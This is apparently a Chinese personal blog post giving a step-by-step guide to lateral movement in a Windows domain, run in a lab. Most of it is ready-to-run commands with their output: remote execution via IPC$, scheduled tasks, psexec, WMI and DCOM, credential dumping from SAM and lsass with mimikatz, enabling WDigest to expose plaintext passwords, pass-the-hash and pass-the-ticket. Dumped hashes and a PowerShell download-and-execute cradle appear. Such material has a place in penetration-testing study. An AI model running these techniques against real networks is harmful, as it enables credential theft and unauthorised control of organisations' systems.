Lluna's Pure land.

What is life like when singing to wine?

0%

内网渗透测试-域内横向移动

发表于 更新于 分类于 阅读次数: Valine:
本文字数: 9k 阅读时长 ≈ 8 分钟

0x01.Windows常用远程连接

1.IPC

利用条件,开启139、445端口,没有关闭默认共享

1
2
3
4
5
6
7
8
9
10
11
12
13
C:\Users\Administrator>net use \\10.10.10.20\ipc$ "11" /user:administrator
命令成功完成。


C:\Users\Administrator>net use
会记录新的网络连接。


状态       本地        远程                      网络

-------------------------------------------------------------------------------
OK                     \\10.10.10.20\ipc$        Microsoft Windows Network
命令成功完成。

2.windows自带工具获取信息

前提是建立ipc$连接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
C:\Users\Administrator>dir \\10.10.10.20\c$
 驱动器 \\10.10.10.20\c$ 中的卷没有标签。
 卷的序列号是 AA35-C001

 \\10.10.10.20\c$ 的目录

2021/06/22  14:58         1,379,216 accesschk.exe
2021/07/23  13:25            17,368 demo.ps1
2021/07/29  13:29            13,672 Get-GPPPassword.ps1
2021/07/13  17:11            38,616 nc.exe
2021/07/16  19:18           133,120 netview.exe
2009/07/14  11:20    <DIR>          PerfLogs
2021/07/23  12:49            37,667 powercat.ps1
2021/07/28  21:01           600,580 PowerUp.ps1
2021/07/10  14:52    <DIR>          Program Files
2021/07/16  18:04    <DIR>          Program Files (x86)
2016/06/28  09:49           170,160 PsLoggedon.exe
2021/07/16  17:44            53,248 PVEFindADUser.exe
2021/07/17  15:29           974,235 SharpHound.ps1
2021/07/23  13:06            17,416 shell.ps1
2021/07/27  17:52            16,663 Sherlock.ps1
2021/07/11  11:27    <DIR>          Users
2021/07/17  11:04    <DIR>          Windows
              12 个文件      3,451,961 字节
               5 个目录 51,462,012,928 可用字节

3.计划任务

01.at命令(server 2008之前)

1
2
3
4
5
6
net time \\10.10.10.20    #查看系统时间
copy calc.bat \\10.10.10.20\c$    #复制文件到目标系统(内容为calc.exe)
at \\10.10.10.20 0:0AM c:\calc.bat    #创建计划任务
at \\10.10.10.20 id /delete    #删除计划任务
at \\10.10.10.20 0:0AM cmd.exe /c "ipconfig > c:/1.txt"  #写入文件
type \\10.10.10.20\c$\1.txt  #查看文件

02.schtasks命令(server 2008之后)

1
2
3
4
schtasks /create /s 10.10.10.20 /tn demo /sc onstart /tr c:\calc.bat /ru system /f  #创建一个demo计划任务
schtasks /run /s 10.10.10.20 /i /tn "demo" #运行计划任务
schtasks /delete /s 10.10.10.20 /tn "demo" /f #删除计划任务
net use \\10.10.10.20\ipc$ /del /y  #删除ipc$连接

0x02.windows系统散列值获取

LM Hash与NTLM Hash

LM Hash一共14位,server 2003以后使用NTLM Hash

1.Getpassword

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
Getpassword.exe

Authentication Id:0;363018
Authentication Package:Kerberos
Primary User:Administrator
Authentication Domain:JIYE

* User: Administrator
* Domain: JIYE
* Password: 11

Authentication Id:0;997
Authentication Package:Negotiate
Primary User:LOCAL SERVICE
Authentication Domain:NT AUTHORITY

* User: 
* Domain: 
* Password: 

Authentication Id:0;996
Authentication Package:Negotiate
Primary User:WIN7DC1$
Authentication Domain:JIYE

* User: WIN7DC1$
* Domain: JIYE
* Password: 1G-\ K=Ae q-70DKy+%W7O:02'JrVV7P^w?A&Po\R./j9TSdQp2tc1W);vJN9.Q5Qov9 -l;`H%W4xcb>J.\m!n*x$bM2r4c`=*%)Mu"8TaBkTM]%Q%IpQs8

Authentication Id:0;47004
Authentication Package:NTLM
Primary User:
Authentication Domain:
 (LUID ERROR) 

Authentication Id:0;999
Authentication Package:Negotiate
Primary User:WIN7DC1$
Authentication Domain:JIYE

* User: WIN7DC1$
* Domain: JIYE
* Password: 1G-\ K=Ae q-70DKy+%W7O:02'JrVV7P^w?A&Po\R./j9TSdQp2tc1W);vJN9.Q5Qov9 -l;`H%W4xcb>J.\m!n*x$bM2r4c`=*%)Mu"8TaBkTM]%Q%IpQs8

2.PwDump7

1
2
3
4
5
PwDump7.exe

Administrator:500:NO PASSWORD*********************:31D6CFE0D16AE931B73C59D7E0C089C0:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
administration:1000:NO PASSWORD*********************:AE0597DC61A5C66B3A0600C60044C448:::

3.QuarksPwDump

1
QuarksPwDump.exe -h

4.通过SAM和system文件获取密码

(1)导出

1
2
reg save hklm\sam sam.hive
reg save hklm\system system.hive

(2)mimikatz获取hash

1
lsadump::sam /sam:sam.hive /system:system.hive  #sam.hive与system.hive在mimikatz目录下

(3)mimikatz直接获取本地SAM

1
privilege::debugtoken::elevate  #提权至systemlsadump::sam  #获取本地SAMsekurlsa::logonpasswords  #获取明文密码NTLM Hash

(4)minikatz在线读取SAM文件

1
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"

5.mimikatz离线读取lsass.dmp

lsass.exe进程里面含有明文密码与散列值

找到lsass.exe进程,右键创建储存文件即可导出

导出文件位置:C:\Users\administrator\AppData\Local\Temp\lsass.exe

也可以使用procdump.exe导出lsass.dmp文件,prodump为微软官方工具不会被查杀

1
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz获取lsass.dmp中的散列值

1
sekurlsa::minidump lsass.dmp  #导入sekurlsa::logonpasswords full  #获取

6.powershell对散列值进行dump

nishang脚本

1
PS C:\> Import-Module .\Get-PassHashes.ps1PS C:\> Get-PassHashesAdministrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::administration:1000:aad3b435b51404eeaad3b435b51404ee:ae0597dc61a5c66b3a0600c60044c448:::

7.powershell远程加载mimikatz获取密码与散列值

1
powershell IEX (New-Object Net.WebClient).DownloadString('.\Invoke-Mimikatz.ps1');Invoke-Mimikatz

8.单机密码抓取

server 2012以上默认关闭Wdigest功能,server 2012以下版本如果安装了KB2871997也无法获取

开启Wdigest的两种方法

(1)使用reg add命令

1
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f  #开启reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f  #关闭

(2)powershell

1
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 0

0x03.哈希传递

1.使用NTLM Hash进行哈希传递

环境

域名:jiye.net

IP:10.10.10.10

用户名:administrator

NTLM Hash:ae0597dc61a5c66b3a0600c60044c448

1
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:jiye.net /ntlm:ae0597dc61a5c66b3a0600c60044c448"

在弹出的system cmd输入

1
dir \\DC\C$  #列出域控目标文件夹

2.使用AES-256密钥进行哈希传递

目标系统安装KB2871997

0x04.票据传递

1.mimikatz进行票据传递

(1)导出内存中的票据

1
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"

(2)清除内存中票据

1
kerberos::purge

(3)将高权限票据注入内存

1
kerberos::ptt c:\mimikatz\tickets\[0;24329]-2-0-40e10000-Administrator@krbtgt-JIYE.NET.kirbi

(4)列出目标文件夹

1
dir \\DC\C$

2.kekeo进行票据传递

环境

域名:jiye.net

IP:10.10.10.10

用户名:administrator

NTLM Hash:ae0597dc61a5c66b3a0600c60044c448

(1)生成票据

1
kekeo.exe "tgt::ask /user:administrator /domain:jiye.net /ntlm:ae0597dc61a5c66b3a0600c60044c448"

(2)清除内存中票据

1
kekeo# kerberos::purgeklist purge  #window自带

(3)导入票据

1
kerberos::ptt C:\TGT_administrator@JIYE.NET_krbtgt~jiye.net@JIYE.NET.kirbi

(4)列出目标文件夹

1
dir \\DC\C$

0x05.psexec的使用

1.PsTools工具包中的psexec

(1)获取system shell(需要建立ipc$连接)

1
psexec.exe -accepteula \\10.10.10.10 -s cmd.exe

(2)获取administrator shell

1
psexec.exe -accepteula \\10.10.10.10 cmd.exe

(3)没有建立ipc$连接的使用方法

1
psexec.exe -accepteula \\10.10.10.10 -u administrator -p 11 cmd.exe

(4)命令回显

1
psexec.exe -accepteula \\10.10.10.10 -s cmd.exe /c "ipconfig"

2.msf 中的psexec

1
msf6 > use exploit/windows/smb/psexecmsf6 exploit(windows/smb/psexec) > set rhosts 10.10.10.10rhosts => 10.10.10.10msf6 exploit(windows/smb/psexec) > set smbdomain jiye.netsmbdomain => jiye.netmsf6 exploit(windows/smb/psexec) > set smbuser administratorsmbuser => administratormsf6 exploit(windows/smb/psexec) > set smbpass 11smbpass => 11msf6 exploit(windows/smb/psexec) > set lhost 10.10.10.130lhost => 10.10.10.130msf6 exploit(windows/smb/psexec) >run

0x08.WMIC的使用

1.Windows系统自带

1
wmic /node:10.10.10.10 /user:administrator /password:11 process call create "cmd.exe /c ipconfig > c:\ip.txt"type \\10.10.10.10\c$\ip.txt

2.impacket工具包

主要用于Linux向window移动

1
wmiexec.py administrator:11@10.10.10.10

3.wmiexec.vbs调用wmi

(1)获取system shell

1
cscript.exe //nologo wmiexec.vbs /shell 10.10.10.10 administrator 11

(2)命令回显

1
cscript.exe wmiexec.vbs /cmd 10.10.10.10 administrator 11 "ipconfig"

4.Invoke-WmiCommand.ps1

1
$User="jiye\administrator"  #目标系统用户名$Password=ConvertTo-SecureString -String "11" -AsPlainText -Force  #目标系统密码$Cred=New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User,$Password #整合$Remote=Invoke-WmiCommand -Payload {ipconfig} -Credential $Cred -ComputerName 10.10.10.10  #执行$Remote.PaylaodOutput  #输出

5.Invoke-WMIMethod

Powershell自带

1
$User="jiye\administrator"  #目标系统用户名$Password=ConvertTo-SecureString -String "11" -AsPlainText -Force  #目标系统密码$Cred=New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User,$Password #整合Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "calc.exe" -ComputerName "10.10.10.10"  -Credential $Cred  #运行calc

0x09.smbexec

1.C++版

2.impacket版

1
smbexec_impacket.exe jiye/administrator:11@10.10.10.10

3.linux安装版

0x10.DCOM的使用

1.powershell获取DCOM程序列表

1
Get-CimInstance Win32_DCOMApplication  #server 2012版本以上Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication #win 7、server 2008等

2.DCOM执行系统命令

运行calc.exe,同理将calc.exe换成恶意程序即可

1
$com=[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","127.0.0.1"))$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimized")

3.DCOM在远程主机上执行命令

环境

域控:DC(jiye.net)

IP:10.10.10.10

user:administrator

pass:11

成员服务器:WIN7

IP:10.10.10.20

user:DC1

pass:11

(1)首先建立ipc$连接

1
net use \\10.10.10.10 "11" /user:jiye\administrator

(2)调用MMC20.Application执行远程命令

1
$com=[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.20"))$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimized")

(3)调用{9BA05972-F6A8-11CF-A442-00A0C90A8F39}

1
$com=[type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"10.10.10.20")$obj=[System.Activator]::CreateInstance($com)$item=$obj.item()$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)
-------------纸短情长下次再见-------------